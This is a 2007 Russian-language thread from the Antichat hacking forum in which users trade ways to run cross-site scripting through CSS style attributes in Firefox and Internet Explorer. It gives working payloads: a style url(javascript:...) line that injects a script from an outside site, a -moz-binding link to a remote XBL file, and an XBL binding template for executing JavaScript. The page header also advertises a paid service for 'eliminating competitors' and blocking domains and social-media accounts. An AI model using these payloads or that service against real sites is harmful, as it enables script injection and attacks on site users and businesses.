Форум АНТИЧАТ - XSS через style в Mozilla FireFox.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS через style в Mozilla FireFox.

Опции темы

Поиск в этой теме

Опции просмотра

XSS через style в Mozilla FireFox.

27.11.2007, 16:56

Loopy

Новичок

Регистрация: 14.07.2007

Сообщений: 29

Провел на форуме:
52130

Репутация: 10

XSS через style в Mozilla FireFox.

Хай.
По сабжу не подскажите?
В IE: style="background: url(javascript:alert());", а в Мозилле, слышал про -mozilla-opacity, или как-то так..
Нужно, чтобы в Мозилле при загрузке страницы сразу исполнялась XSS в аттрибуте style..

27.11.2007, 16:59

Евгений Минаев

Познающий

Регистрация: 12.11.2007

Сообщений: 70

Провел на форуме:
1214722

Репутация: 676

Попробуй так

Цитата:

<a href="#" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);

27.11.2007, 17:06

Loopy

Новичок

Регистрация: 14.07.2007

Сообщений: 29

Провел на форуме:
52130

Репутация: 10

Евгений Минаев
Посмотрел этот XML, не, это жесткий метод.. сложно свободно писать Js.. Я хочю через аттрибут в стайле выполнить XSS подключающий сторонний Js-код, путём createElement..

27.11.2007, 17:15

Loopy

Новичок

Регистрация: 14.07.2007

Сообщений: 29

Провел на форуме:
52130

Репутация: 10

Быть точнее.
style="background: url(javascript: document.createElement('script').src='http://www.mysite.ru/myscript.js');"
Это идеально для IE, тоже самое мне нужно в Мозилле, т.к. этот код не валиден Фоксу.

27.11.2007, 17:41

Loopy

Новичок

Регистрация: 14.07.2007

Сообщений: 29

Провел на форуме:
52130

Репутация: 10

Подключил... Через биндинг..

CSS: -moz-binding: url("http://localhost/xml.xml#xss");
XML: <?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
JavaScript code...
</constructor>
</implementation>
</binding>
</bindings>

27.11.2007, 22:44

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

http://ha.ckers.org/xss.html

__________________

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Mozilla разбогатела и отреклась от Google	Vanterlog	Мировые новости	3	28.10.2007 03:00
Firefox по-прежнему «открыт» для хакеров: выполнение команд через URL	c001er*	Мировые новости	7	11.09.2007 01:06
Mozilla Firefox URLBar: выполнение произвольного кода.	-=lebed=-	Уязвимости	5	29.07.2007 11:48
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
Mozilla Firefox 3: проверка на прочность	@NoFrag@	Мировые новости	11	05.02.2007 15:30

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход